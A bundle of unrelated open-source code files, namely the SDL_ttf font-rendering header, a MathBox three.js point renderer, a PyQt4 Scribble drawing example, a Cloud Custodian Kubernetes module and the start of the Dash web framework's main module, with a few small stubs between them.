/* Get/Set whether or not kerning is allowed for this font */
extern DECLSPEC int SDLCALL TTF_GetFontKerning(const TTF_Font *font);
extern DECLSPEC void SDLCALL TTF_SetFontKerning(TTF_Font *font, int allowed);
/* Get the number of faces of the font */
extern DECLSPEC long SDLCALL TTF_FontFaces(const TTF_Font *font);
/* Get the font face attributes, if any */
extern DECLSPEC int SDLCALL TTF_FontFaceIsFixedWidth(const TTF_Font *font);
extern DECLSPEC char * SDLCALL TTF_FontFaceFamilyName(const TTF_Font *font);
extern DECLSPEC char * SDLCALL TTF_FontFaceStyleName(const TTF_Font *font);
/* Check wether a glyph is provided by the font or not */
extern DECLSPEC int SDLCALL TTF_GlyphIsProvided(TTF_Font *font, Uint16 ch);
extern DECLSPEC int SDLCALL TTF_GlyphIsProvided32(TTF_Font *font, Uint32 ch);
/* Get the metrics (dimensions) of a glyph
To understand what these metrics mean, here is a useful link:
http://freetype.sourceforge.net/freetype2/docs/tutorial/step2.html
*/
extern DECLSPEC int SDLCALL TTF_GlyphMetrics(TTF_Font *font, Uint16 ch,
int *minx, int *maxx,
int *miny, int *maxy, int *advance);
extern DECLSPEC int SDLCALL TTF_GlyphMetrics32(TTF_Font *font, Uint32 ch,
int *minx, int *maxx,
int *miny, int *maxy, int *advance);
/* Get the dimensions of a rendered string of text */
extern DECLSPEC int SDLCALL TTF_SizeText(TTF_Font *font, const char *text, int *w, int *h);
extern DECLSPEC int SDLCALL TTF_SizeUTF8(TTF_Font *font, const char *text, int *w, int *h);
extern DECLSPEC int SDLCALL TTF_SizeUNICODE(TTF_Font *font, const Uint16 *text, int *w, int *h);
/* Get the measurement string of text without rendering
e.g. the number of characters that can be rendered before reaching 'measure_width'
in:
measure_width - in pixels to measure this text
out:
count - number of characters that can be rendered
extent - latest calculated width
*/
extern DECLSPEC int SDLCALL TTF_MeasureText(TTF_Font *font, const char *text, int measure_width, int *extent, int *count);
extern DECLSPEC int SDLCALL TTF_MeasureUTF8(TTF_Font *font, const char *text, int measure_width, int *extent, int *count);
extern DECLSPEC int SDLCALL TTF_MeasureUNICODE(TTF_Font *font, const Uint16 *text, int measure_width, int *extent, int *count);
/* Create an 8-bit palettized surface and render the given text at
fast quality with the given font and color. The 0 pixel is the
colorkey, giving a transparent background, and the 1 pixel is set
to the text color.
This function returns the new surface, or NULL if there was an error.
*/
extern DECLSPEC SDL_Surface * SDLCALL TTF_RenderText_Solid(TTF_Font *font,
const char *text, SDL_Color fg);
extern DECLSPEC SDL_Surface * SDLCALL TTF_RenderUTF8_Solid(TTF_Font *font,
const char *text, SDL_Color fg);
extern DECLSPEC SDL_Surface * SDLCALL TTF_RenderUNICODE_Solid(TTF_Font *font,
const Uint16 *text, SDL_Color fg);
/* Create an 8-bit palettized surface and render the given text at
fast quality with the given font and color. The 0 pixel is the
colorkey, giving a transparent background, and the 1 pixel is set
to the text color.
Text is wrapped to multiple lines on line endings and on word boundaries
if it extends beyond wrapLength in pixels.
If wrapLength is 0, only wrap on new lines.
This function returns the new surface, or NULL if there was an error.
*/
extern DECLSPEC SDL_Surface * SDLCALL TTF_RenderText_Solid_Wrapped(TTF_Font *font,
const char *text, SDL_Color fg, Uint32 wrapLength);
extern DECLSPEC SDL_Surface * SDLCALL TTF_RenderUTF8_Solid_Wrapped(TTF_Font *font,
const char *text, SDL_Color fg, Uint32 wrapLength);
extern DECLSPEC SDL_Surface * SDLCALL TTF_RenderUNICODE_Solid_Wrapped(TTF_Font *font,
const Uint16 *text, SDL_Color fg, Uint32 wrapLength);
/* Create an 8-bit palettized surface and render the given glyph at
fast quality with the given font and color. The 0 pixel is the
colorkey, giving a transparent background, and the 1 pixel is set
to the text color. The glyph is rendered without any padding or
centering in the X direction, and aligned normally in the Y direction.
This function returns the new surface, or NULL if there was an error.
*/
extern DECLSPEC SDL_Surface * SDLCALL TTF_RenderGlyph_Solid(TTF_Font *font,
Uint16 ch, SDL_Color fg);
extern DECLSPEC SDL_Surface * SDLCALL TTF_RenderGlyph32_Solid(TTF_Font *font,
Uint32 ch, SDL_Color fg);
/* Create an 8-bit palettized surface and render the given text at
high quality with the given font and colors. The 0 pixel is background,
while other pixels have varying degrees of the foreground color.
This function returns the new surface, or NULL if there was an error.
*/
extern DECLSPEC SDL_Surface * SDLCALL TTF_RenderText_Shaded(TTF_Font *font,
const char *text, SDL_Color fg, SDL_Color bg);
extern DECLSPEC SDL_Surface * SDLCALL TTF_RenderUTF8_Shaded(TTF_Font *font,
const char *text, SDL_Color fg, SDL_Color bg);
extern DECLSPEC SDL_Surface * SDLCALL TTF_RenderUNICODE_Shaded(TTF_Font *font,
const Uint16 *text, SDL_Color fg, SDL_Color bg);
/* Create an 8-bit palettized surface and render the given text at
high quality with the given font and colors. The 0 pixel is background,
while other pixels have varying degrees of the foreground color.
Text is wrapped to multiple lines on line endings and on word boundaries
if it extends beyond wrapLength in pixels.
If wrapLength is 0, only wrap on new lines.
This function returns the new surface, or NULL if there was an error.
*/
extern DECLSPEC SDL_Surface * SDLCALL TTF_RenderText_Shaded_Wrapped(TTF_Font *font,
const char *text, SDL_Color fg, SDL_Color bg, Uint32 wrapLength);
extern DECLSPEC SDL_Surface * SDLCALL TTF_RenderUTF8_Shaded_Wrapped(TTF_Font *font,
const char *text, SDL_Color fg, SDL_Color bg, Uint32 wrapLength);
extern DECLSPEC SDL_Surface * SDLCALL TTF_RenderUNICODE_Shaded_Wrapped(TTF_Font *font,
const Uint16 *text, SDL_Color fg, SDL_Color bg, Uint32 wrapLength);
/* Create an 8-bit palettized surface and render the given glyph at
high quality with the given font and colors. The 0 pixel is background,
while other pixels have varying degrees of the foreground color.
The glyph is rendered without any padding or centering in the X
direction, and aligned normally in the Y direction.
This function returns the new surface, or NULL if there was an error.
*/
extern DECLSPEC SDL_Surface * SDLCALL TTF_RenderGlyph_Shaded(TTF_Font *font,
Uint16 ch, SDL_Color fg, SDL_Color bg);
extern DECLSPEC SDL_Surface * SDLCALL TTF_RenderGlyph32_Shaded(TTF_Font *font,
Uint32 ch, SDL_Color fg, SDL_Color bg);
/* Create a 32-bit ARGB surface and render the given text at high quality,
using alpha blending to dither the font with the given color.
This function returns the new surface, or NULL if there was an error.
*/
extern DECLSPEC SDL_Surface * SDLCALL TTF_RenderText_Blended(TTF_Font *font,
const char *text, SDL_Color fg);
extern DECLSPEC SDL_Surface * SDLCALL TTF_RenderUTF8_Blended(TTF_Font *font,
const char *text, SDL_Color fg);
extern DECLSPEC SDL_Surface * SDLCALL TTF_RenderUNICODE_Blended(TTF_Font *font,
const Uint16 *text, SDL_Color fg);
/* Create a 32-bit ARGB surface and render the given text at high quality,
using alpha blending to dither the font with the given color.
Text is wrapped to multiple lines on line endings and on word boundaries
if it extends beyond wrapLength in pixels.
If wrapLength is 0, only wrap on new lines.
This function returns the new surface, or NULL if there was an error.
*/
extern DECLSPEC SDL_Surface * SDLCALL TTF_RenderText_Blended_Wrapped(TTF_Font *font,
const char *text, SDL_Color fg, Uint32 wrapLength);
extern DECLSPEC SDL_Surface * SDLCALL TTF_RenderUTF8_Blended_Wrapped(TTF_Font *font,
const char *text, SDL_Color fg, Uint32 wrapLength);
extern DECLSPEC SDL_Surface * SDLCALL TTF_RenderUNICODE_Blended_Wrapped(TTF_Font *font,
const Uint16 *text, SDL_Color fg, Uint32 wrapLength);
/* Create a 32-bit ARGB surface and render the given glyph at high quality,
using alpha blending to dither the font with the given color.
The glyph is rendered without any padding or centering in the X
direction, and aligned normally in the Y direction.
This function returns the new surface, or NULL if there was an error.
*/
extern DECLSPEC SDL_Surface * SDLCALL TTF_RenderGlyph_Blended(TTF_Font *font,
Uint16 ch, SDL_Color fg);
extern DECLSPEC SDL_Surface * SDLCALL TTF_RenderGlyph32_Blended(TTF_Font *font,
Uint32 ch, SDL_Color fg);
/* For compatibility with previous versions, here are the old functions */
#define TTF_RenderText(font, text, fg, bg) \
TTF_RenderText_Shaded(font, text, fg, bg)
#define TTF_RenderUTF8(font, text, fg, bg) \
TTF_RenderUTF8_Shaded(font, text, fg, bg)
#define TTF_RenderUNICODE(font, text, fg, bg) \
TTF_RenderUNICODE_Shaded(font, text, fg, bg)
/* Set Direction and Script to be used for text shaping.
- direction is of type hb_direction_t
- script is of type hb_script_t
This functions returns always 0, or -1 if SDL_ttf is not compiled with HarfBuzz
*/
extern DECLSPEC int SDLCALL TTF_SetDirection(int direction); /* hb_direction_t */
extern DECLSPEC int SDLCALL TTF_SetScript(int script); /* hb_script_t */
/* Set direction and script per font */
extern DECLSPEC int SDLCALL TTF_SetFontDirection(TTF_Font *font, int direction); /* hb_direction_t */
extern DECLSPEC int SDLCALL TTF_SetFontScript(TTF_Font *font, int script); /* hb_script_t */
/* Close an opened font file */
extern DECLSPEC void SDLCALL TTF_CloseFont(TTF_Font *font);
/* De-initialize the TTF engine */
extern DECLSPEC void SDLCALL TTF_Quit(void);
/* Check if the TTF engine is initialized */
extern DECLSPEC int SDLCALL TTF_WasInit(void);
/* Get the kerning size of two glyphs indices */
/* DEPRECATED: this function requires FreeType font indexes, not glyphs,
by accident, which we don't expose through this API, so it could give
wildly incorrect results, especially with non-ASCII values.
Going forward, please use TTF_GetFontKerningSizeGlyphs() instead, which
does what you probably expected this function to do. */
extern DECLSPEC int TTF_GetFontKerningSize(TTF_Font *font, int prev_index, int index) SDL_DEPRECATED;
/* Get the kerning size of two glyphs */
extern DECLSPEC int TTF_GetFontKerningSizeGlyphs(TTF_Font *font, Uint16 previous_ch, Uint16 ch);
extern DECLSPEC int TTF_GetFontKerningSizeGlyphs32(TTF_Font *font, Uint32 previous_ch, Uint32 ch);
/* Enable Signed Distance Field rendering (with the Blended APIs) */
extern DECLSPEC int TTF_SetFontSDF(TTF_Font *font, SDL_bool on_off);
extern DECLSPEC SDL_bool TTF_GetFontSDF(const TTF_Font *font);
/* We'll use SDL for reporting errors */
#define TTF_SetError SDL_SetError
#define TTF_GetError SDL_GetError
/* Ends C function definitions when using C++ */
#ifdef __cplusplus
}
#endif
#include "close_code.h"
#endif /* SDL_TTF_H_ */
/* vi: set ts=4 sw=4 expandtab: */
|
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
__version__ = '0.8.2'
|
/**
* First we will load all of this project's JavaScript dependencies which
* includes React and other helpers. It's a great starting point while
* building robust, powerful web applications using React + Laravel.
*/
require('./bootstrap');
/* Import the Main component */
import Main from './components/Main'; |
// TODO: This file was created by bulk-decaffeinate.
// Sanity-check the conversion and remove this comment.
/*
* decaffeinate suggestions:
* DS102: Remove unnecessary code created because of implicit returns
* DS104: Avoid inline assignments
* DS207: Consider shorter variations of null checks
* Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md
*/
import * as THREE from "three";
import { Base } from "./base";
import { SpriteGeometry } from "../geometry";
export class Point extends Base {
constructor(renderer, shaders, options) {
let f, left;
super(renderer, shaders, options);
let {
uniforms,
material,
position,
color,
size,
mask,
map,
combine,
linear,
shape,
optical,
fill,
stpq,
} = options;
if (uniforms == null) {
uniforms = {};
}
shape = +shape != null ? +shape : 0;
if (fill == null) {
fill = true;
}
const hasStyle = uniforms.styleColor != null;
const shapes = [
"circle",
"square",
"diamond",
"up",
"down",
"left",
"right",
];
const passes = [
"circle",
"generic",
"generic",
"generic",
"generic",
"generic",
"generic",
];
const scales = [1.2, 1, 1.414, 1.16, 1.16, 1.16, 1.16];
const pass = passes[shape] != null ? passes[shape] : passes[0];
const _shape = shapes[shape] != null ? shapes[shape] : shapes[0];
const _scale = (left = optical && scales[shape]) != null ? left : 1;
const alpha = fill ? pass : `${pass}.hollow`;
this.geometry = new SpriteGeometry({
items: options.items,
width: options.width,
height: options.height,
depth: options.depth,
});
this._adopt(uniforms);
this._adopt(this.geometry.uniforms);
const defines = { POINT_SHAPE_SCALE: +(_scale + 0.00001) };
// Shared vertex shader
const factory = shaders.material();
const v = factory.vertex;
v.pipe(this._vertexColor(color, mask));
// Point sizing
if (size) {
v.isolate();
v.require(size);
v.require("point.size.varying", this.uniforms);
v.end();
} else {
v.require("point.size.uniform", this.uniforms);
}
v.require(this._vertexPosition(position, material, map, 2, stpq));
v.pipe("point.position", this.uniforms, defines);
v.pipe("project.position", this.uniforms);
// Shared fragment shader
factory.fragment = f = this._fragmentColor(
hasStyle,
material,
color,
mask,
map,
2,
stpq,
combine,
linear
);
// Split fragment into edge and fill pass for better z layering
const edgeFactory = shaders.material();
edgeFactory.vertex.pipe(v);
f = edgeFactory.fragment.pipe(factory.fragment);
f.require(`point.mask.${_shape}`, this.uniforms);
f.require(`point.alpha.${alpha}`, this.uniforms);
f.pipe("point.edge", this.uniforms);
const fillFactory = shaders.material();
fillFactory.vertex.pipe(v);
f = fillFactory.fragment.pipe(factory.fragment);
f.require(`point.mask.${_shape}`, this.uniforms);
f.require(`point.alpha.${alpha}`, this.uniforms);
f.pipe("point.fill", this.uniforms);
this.fillMaterial = this._material(
fillFactory.link({
side: THREE.DoubleSide,
})
);
this.edgeMaterial = this._material(
edgeFactory.link({
side: THREE.DoubleSide,
})
);
this.fillObject = new THREE.Mesh(this.geometry, this.fillMaterial);
this.edgeObject = new THREE.Mesh(this.geometry, this.edgeMaterial);
this._raw(this.fillObject);
this._raw(this.edgeObject);
this.renders = [this.fillObject, this.edgeObject];
}
show(transparent, blending, order, depth) {
this._show(this.edgeObject, true, blending, order, depth);
return this._show(this.fillObject, transparent, blending, order, depth);
}
dispose() {
this.geometry.dispose();
this.edgeMaterial.dispose();
this.fillMaterial.dispose();
this.renders =
this.edgeObject =
this.fillObject =
this.geometry =
this.edgeMaterial =
this.fillMaterial =
null;
return super.dispose();
}
}
|
#!/usr/bin/env python
# http://stackoverflow.com/a/8556231/5288758
#############################################################################
##
## Copyright (C) 2010 Riverbank Computing Limited.
## Copyright (C) 2010 Nokia Corporation and/or its subsidiary(-ies).
## All rights reserved.
##
## This file is part of the examples of PyQt.
##
## $QT_BEGIN_LICENSE:BSD$
## You may use this file under the terms of the BSD license as follows:
##
## "Redistribution and use in source and binary forms, with or without
## modification, are permitted provided that the following conditions are
## met:
## * Redistributions of source code must retain the above copyright
## notice, this list of conditions and the following disclaimer.
## * Redistributions in binary form must reproduce the above copyright
## notice, this list of conditions and the following disclaimer in
## the documentation and/or other materials provided with the
## distribution.
## * Neither the name of Nokia Corporation and its Subsidiary(-ies) nor
## the names of its contributors may be used to endorse or promote
## products derived from this software without specific prior written
## permission.
##
## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
## "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
## LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
## A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
## OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
## SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
## LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
## DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
## THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
## (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
## OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."
## $QT_END_LICENSE$
##
#############################################################################
# These are only needed for Python v2 but are harmless for Python v3.
import sip
sip.setapi('QString', 2)
sip.setapi('QVariant', 2)
from PyQt4 import QtCore, QtGui
class ScribbleArea(QtGui.QWidget):
"""
this scales the image but it's not good, too many refreshes really mess it up!!!
"""
def __init__(self, parent=None):
super(ScribbleArea, self).__init__(parent)
self.setAttribute(QtCore.Qt.WA_StaticContents)
self.modified = False
self.scribbling = False
self.myPenWidth = 1
self.myPenColor = QtCore.Qt.blue
imageSize = QtCore.QSize(500, 500)
# self.image = QtGui.QImage()
self.image = QtGui.QImage(imageSize, QtGui.QImage.Format_RGB32)
self.lastPoint = QtCore.QPoint()
def openImage(self, fileName):
loadedImage = QtGui.QImage()
if not loadedImage.load(fileName):
return False
w = loadedImage.width()
h = loadedImage.height()
self.mainWindow.resize(w, h)
# newSize = loadedImage.size().expandedTo(self.size())
# self.resizeImage(loadedImage, newSize)
self.image = loadedImage
self.modified = False
self.update()
return True
def saveImage(self, fileName, fileFormat):
visibleImage = self.image
self.resizeImage(visibleImage, self.size())
if visibleImage.save(fileName, fileFormat):
self.modified = False
return True
else:
return False
def setPenColor(self, newColor):
self.myPenColor = newColor
def setPenWidth(self, newWidth):
self.myPenWidth = newWidth
def clearImage(self):
self.image.fill(QtGui.qRgb(255, 255, 255))
self.modified = True
self.update()
def mousePressEvent(self, event):
# print "self.image.width() = %d" % self.image.width()
# print "self.image.height() = %d" % self.image.height()
# print "self.image.size() = %s" % self.image.size()
# print "self.size() = %s" % self.size()
# print "event.pos() = %s" % event.pos()
if event.button() == QtCore.Qt.LeftButton:
self.lastPoint = event.pos()
self.scribbling = True
def mouseMoveEvent(self, event):
if (event.buttons() & QtCore.Qt.LeftButton) and self.scribbling:
self.drawLineTo(event.pos())
def mouseReleaseEvent(self, event):
if event.button() == QtCore.Qt.LeftButton and self.scribbling:
self.drawLineTo(event.pos())
self.scribbling = False
def paintEvent(self, event):
painter = QtGui.QPainter(self)
painter.drawImage(event.rect(), self.image)
def resizeEvent(self, event):
# print "resize event"
# print "event = %s" % event
# print "event.oldSize() = %s" % event.oldSize()
# print "event.size() = %s" % event.size()
self.resizeImage(self.image, event.size())
# if self.width() > self.image.width() or self.height() > self.image.height():
# newWidth = max(self.width() + 128, self.image.width())
# newHeight = max(self.height() + 128, self.image.height())
# print "newWidth = %d, newHeight = %d" % (newWidth, newHeight)
# self.resizeImage(self.image, QtCore.QSize(newWidth, newHeight))
# self.update()
super(ScribbleArea, self).resizeEvent(event)
def drawLineTo(self, endPoint):
painter = QtGui.QPainter(self.image)
painter.setPen(QtGui.QPen(self.myPenColor, self.myPenWidth,
QtCore.Qt.SolidLine, QtCore.Qt.RoundCap, QtCore.Qt.RoundJoin))
painter.drawLine(self.lastPoint, endPoint)
self.modified = True
# rad = self.myPenWidth / 2 + 2
# self.update(QtCore.QRect(self.lastPoint, endPoint).normalized().adjusted(-rad, -rad, +rad, +rad))
self.update()
self.lastPoint = QtCore.QPoint(endPoint)
def resizeImage(self, image, newSize):
if image.size() == newSize:
return
# print "image.size() = %s" % repr(image.size())
# print "newSize = %s" % newSize
# this resizes the canvas without resampling the image
newImage = QtGui.QImage(newSize, QtGui.QImage.Format_RGB32)
newImage.fill(QtGui.qRgb(255, 255, 255))
painter = QtGui.QPainter(newImage)
painter.drawImage(QtCore.QPoint(0, 0), image)
## this resampled the image but it gets messed up with so many events...
## painter.setRenderHint(QtGui.QPainter.SmoothPixmapTransform, True)
## painter.setRenderHint(QtGui.QPainter.HighQualityAntialiasing, True)
#
# newImage = QtGui.QImage(newSize, QtGui.QImage.Format_RGB32)
# newImage.fill(QtGui.qRgb(255, 255, 255))
# painter = QtGui.QPainter(newImage)
# srcRect = QtCore.QRect(QtCore.QPoint(0,0), image.size())
# dstRect = QtCore.QRect(QtCore.QPoint(0,0), newSize)
## print "srcRect = %s" % srcRect
## print "dstRect = %s" % dstRect
# painter.drawImage(dstRect, image, srcRect)
self.image = newImage
def print_(self):
printer = QtGui.QPrinter(QtGui.QPrinter.HighResolution)
printDialog = QtGui.QPrintDialog(printer, self)
if printDialog.exec_() == QtGui.QDialog.Accepted:
painter = QtGui.QPainter(printer)
rect = painter.viewport()
size = self.image.size()
size.scale(rect.size(), QtCore.Qt.KeepAspectRatio)
painter.setViewport(rect.x(), rect.y(), size.width(), size.height())
painter.setWindow(self.image.rect())
painter.drawImage(0, 0, self.image)
painter.end()
def isModified(self):
return self.modified
def penColor(self):
return self.myPenColor
def penWidth(self):
return self.myPenWidth
class MainWindow(QtGui.QMainWindow):
def __init__(self):
super(MainWindow, self).__init__()
self.saveAsActs = []
self.scribbleArea = ScribbleArea(self)
self.scribbleArea.clearImage()
self.scribbleArea.mainWindow = self # maybe not using this?
self.setCentralWidget(self.scribbleArea)
self.createActions()
self.createMenus()
self.setWindowTitle("Scribble")
self.resize(500, 500)
def closeEvent(self, event):
if self.maybeSave():
event.accept()
else:
event.ignore()
def open(self):
if self.maybeSave():
fileName = QtGui.QFileDialog.getOpenFileName(self, "Open File",
QtCore.QDir.currentPath())
if fileName:
self.scribbleArea.openImage(fileName)
def save(self):
action = self.sender()
fileFormat = action.data()
self.saveFile(fileFormat)
def penColor(self):
newColor = QtGui.QColorDialog.getColor(self.scribbleArea.penColor())
if newColor.isValid():
self.scribbleArea.setPenColor(newColor)
def penWidth(self):
newWidth, ok = QtGui.QInputDialog.getInteger(self, "Scribble",
"Select pen width:", self.scribbleArea.penWidth(), 1, 50, 1)
if ok:
self.scribbleArea.setPenWidth(newWidth)
def about(self):
QtGui.QMessageBox.about(self, "About Scribble",
"<p>The <b>Scribble</b> example shows how to use "
"QMainWindow as the base widget for an application, and how "
"to reimplement some of QWidget's event handlers to receive "
"the events generated for the application's widgets:</p>"
"<p> We reimplement the mouse event handlers to facilitate "
"drawing, the paint event handler to update the application "
"and the resize event handler to optimize the application's "
"appearance. In addition we reimplement the close event "
"handler to intercept the close events before terminating "
"the application.</p>"
"<p> The example also demonstrates how to use QPainter to "
"draw an image in real time, as well as to repaint "
"widgets.</p>")
def createActions(self):
self.openAct = QtGui.QAction("&Open...", self, shortcut="Ctrl+O",
triggered=self.open)
for format in QtGui.QImageWriter.supportedImageFormats():
format = str(format)
text = format.upper() + "..."
action = QtGui.QAction(text, self, triggered=self.save)
action.setData(format)
self.saveAsActs.append(action)
self.printAct = QtGui.QAction("&Print...", self,
triggered=self.scribbleArea.print_)
self.exitAct = QtGui.QAction("E&xit", self, shortcut="Ctrl+Q",
triggered=self.close)
self.penColorAct = QtGui.QAction("&Pen Color...", self,
triggered=self.penColor)
self.penWidthAct = QtGui.QAction("Pen &Width...", self,
triggered=self.penWidth)
self.clearScreenAct = QtGui.QAction("&Clear Screen", self,
shortcut="Ctrl+L", triggered=self.scribbleArea.clearImage)
self.aboutAct = QtGui.QAction("&About", self, triggered=self.about)
self.aboutQtAct = QtGui.QAction("About &Qt", self,
triggered=QtGui.qApp.aboutQt)
def createMenus(self):
self.saveAsMenu = QtGui.QMenu("&Save As", self)
for action in self.saveAsActs:
self.saveAsMenu.addAction(action)
fileMenu = QtGui.QMenu("&File", self)
fileMenu.addAction(self.openAct)
fileMenu.addMenu(self.saveAsMenu)
fileMenu.addAction(self.printAct)
fileMenu.addSeparator()
fileMenu.addAction(self.exitAct)
optionMenu = QtGui.QMenu("&Options", self)
optionMenu.addAction(self.penColorAct)
optionMenu.addAction(self.penWidthAct)
optionMenu.addSeparator()
optionMenu.addAction(self.clearScreenAct)
helpMenu = QtGui.QMenu("&Help", self)
helpMenu.addAction(self.aboutAct)
helpMenu.addAction(self.aboutQtAct)
self.menuBar().addMenu(fileMenu)
self.menuBar().addMenu(optionMenu)
self.menuBar().addMenu(helpMenu)
def maybeSave(self):
if self.scribbleArea.isModified():
ret = QtGui.QMessageBox.warning(self, "Scribble",
"The image has been modified.\n"
"Do you want to save your changes?",
QtGui.QMessageBox.Save | QtGui.QMessageBox.Discard |
QtGui.QMessageBox.Cancel)
if ret == QtGui.QMessageBox.Save:
return self.saveFile('png')
elif ret == QtGui.QMessageBox.Cancel:
return False
return True
def saveFile(self, fileFormat):
initialPath = QtCore.QDir.currentPath() + '/untitled.' + fileFormat
fileName = QtGui.QFileDialog.getSaveFileName(self, "Save As",
initialPath,
"%s Files (*.%s);;All Files (*)" % (fileFormat.upper(), fileFormat))
if fileName:
return self.scribbleArea.saveImage(fileName, fileFormat)
return False
if __name__ == '__main__':
import sys
app = QtGui.QApplication(sys.argv)
window = MainWindow()
window.show()
sys.exit(app.exec_()) |
# Copyright The Cloud Custodian Authors.
# SPDX-License-Identifier: Apache-2.0
import logging
import c7n_kube.actions.shared # noqa
from c7n_kube.resources.core import (
configmap,
namespace,
node,
pod,
replicationcontroller,
secret,
service,
serviceaccount,
volume)
from c7n_kube.resources.apps import (
daemonset,
deployment,
replicaset,
statefulset)
from c7n_kube.resources import crd
log = logging.getLogger('custodian.k8s')
ALL = [
crd,
configmap,
deployment,
namespace,
node,
pod,
replicationcontroller,
secret,
service,
serviceaccount,
volume,
daemonset,
replicaset,
statefulset]
def initialize_kube():
"""kubernetes entry point
"""
|
from __future__ import print_function
import itertools
import os
import random
import sys
import collections
import importlib
import json
import pkgutil
import threading
import re
import logging
import pprint
from functools import wraps
import flask
from flask import Flask, Response
from flask_compress import Compress
import plotly
import dash_renderer
from .dependencies import Input, Output, State
from .resources import Scripts, Css
from .development.base_component import Component, ComponentRegistry
from . import exceptions
from ._utils import AttributeDict as _AttributeDict
from ._utils import interpolate_str as _interpolate
from ._utils import format_tag as _format_tag
from ._utils import generate_hash as _generate_hash
from ._utils import patch_collections_abc as _patch_collections_abc
from . import _watch
from ._utils import get_asset_path as _get_asset_path
from ._utils import create_callback_id as _create_callback_id
from ._configs import (get_combined_config, pathname_configs)
from .version import __version__
_default_index = '''<!DOCTYPE html>
<html>
<head>
{%metas%}
<title>{%title%}</title>
{%favicon%}
{%css%}
</head>
<body>
{%app_entry%}
<footer>
{%config%}
{%scripts%}
{%renderer%}
</footer>
</body>
</html>'''
_app_entry = '''
<div id="react-entry-point">
<div class="_dash-loading">
Loading...
</div>
</div>
'''
_re_index_entry = re.compile(r'{%app_entry%}')
_re_index_config = re.compile(r'{%config%}')
_re_index_scripts = re.compile(r'{%scripts%}')
_re_renderer_scripts = re.compile(r'{%renderer%}')
_re_index_entry_id = re.compile(r'id="react-entry-point"')
_re_index_config_id = re.compile(r'id="_dash-config"')
_re_index_scripts_id = re.compile(r'src=".*dash[-_]renderer.*"')
_re_renderer_scripts_id = re.compile(r'id="_dash-renderer')
class _NoUpdate(object):
# pylint: disable=too-few-public-methods
pass
# Singleton signal to not update an output, alternative to PreventUpdate
no_update = _NoUpdate()
# pylint: disable=too-many-instance-attributes
# pylint: disable=too-many-arguments, too-many-locals
class Dash(object):
"""
Dash is a framework for building analytical web applications.
No JavaScript required.
If a parameter can be set by an environment variable, that is listed as:
env: ``DASH_****``
Values provided here take precedence over environment variables.
:param name: The name Flask should use for your app. Even if you provide
your own ``server``, ``name`` will be used to help find assets.
Typically ``__name__`` (the magic global var, not a string) is the
best value to use. Default ``'__main__'``, env: ``DASH_APP_NAME``
:type name: string
:param server: Sets the Flask server for your app. There are three options:
``True`` (default): Dash will create a new server
``False``: The server will be added later via ``app.init_app(server)``
where ``server`` is a ``flask.Flask`` instance.
``flask.Flask``: use this pre-existing Flask server.
:type server: boolean or flask.Flask
:param assets_folder: a path, relative to the current working directory,
for extra files to be used in the browser. Default ``'assets'``.
All .js and .css files will be loaded immediately unless excluded by
``assets_ignore``, and other files such as images will be served if
requested.
:type assets_folder: string
:param assets_url_path: The local urls for assets will be:
``requests_pathname_prefix + assets_url_path + '/' + asset_path``
where ``asset_path`` is the path to a file inside ``assets_folder``.
Default ``'assets'``.
:type asset_url_path: string
:param assets_ignore: A regex, as a string to pass to ``re.compile``, for
assets to omit from immediate loading. Ignored files will still be
served if specifically requested. You cannot use this to prevent access
to sensitive files.
:type assets_ignore: string
:param assets_external_path: an absolute URL from which to load assets.
Use with ``serve_locally=False``. Dash can still find js and css to
automatically load if you also keep local copies in your assets
folder that Dash can index, but external serving can improve
performance and reduce load on the Dash server.
env: ``DASH_ASSETS_EXTERNAL_PATH``
:type assets_external_path: string
:param include_assets_files: Default ``True``, set to ``False`` to prevent
immediate loading of any assets. Assets will still be served if
specifically requested. You cannot use this to prevent access
to sensitive files. env: ``DASH_INCLUDE_ASSETS_FILES``
:type include_assets_files: boolean
:param url_base_pathname: A local URL prefix to use app-wide.
Default ``'/'``. Both `requests_pathname_prefix` and
`routes_pathname_prefix` default to `url_base_pathname`.
env: ``DASH_URL_BASE_PATHNAME``
:type url_base_pathname: string
:param requests_pathname_prefix: A local URL prefix for file requests.
Defaults to `url_base_pathname`, and must end with
`routes_pathname_prefix`. env: ``DASH_REQUESTS_PATHNAME_PREFIX``
:type requests_pathname_prefix: string
:param routes_pathname_prefix: A local URL prefix for JSON requests.
Defaults to ``url_base_pathname``, and must start and end
with ``'/'``. env: ``DASH_ROUTES_PATHNAME_PREFIX``
:type routes_pathname_prefix: string
:param serve_locally: If ``True`` (default), assets and dependencies
(Dash and Component js and css) will be served from local URLs.
If ``False`` we will use CDN links where available.
:type serve_locally: boolean
:param compress: Use gzip to compress files and data served by Flask.
Default ``True``
:type compress: boolean
:param meta_tags: html <meta> tags to be added to the index page.
Each dict should have the attributes and values for one tag, eg:
``{'name': 'description', 'content': 'My App'}``
:type meta_tags: list of dicts
:param index_string: Override the standard Dash index page.
Must contain the correct insertion markers to interpolate various
content into it depending on the app config and components used.
See https://dash.plot.ly/external-resources for details.
:type index_string: string
:param external_scripts: Additional JS files to load with the page.
Each entry can be a string (the URL) or a dict with ``src`` (the URL)
and optionally other ``<script>`` tag attributes such as ``integrity``
and ``crossorigin``.
:type external_scripts: list of strings or dicts
:param external_stylesheets: Additional CSS files to load with the page.
Each entry can be a string (the URL) or a dict with ``href`` (the URL)
and optionally other ``<link>`` tag attributes such as ``rel``,
``integrity`` and ``crossorigin``.
:type external_stylesheets: list of strings or dicts
:param suppress_callback_exceptions: Default ``False``: check callbacks to
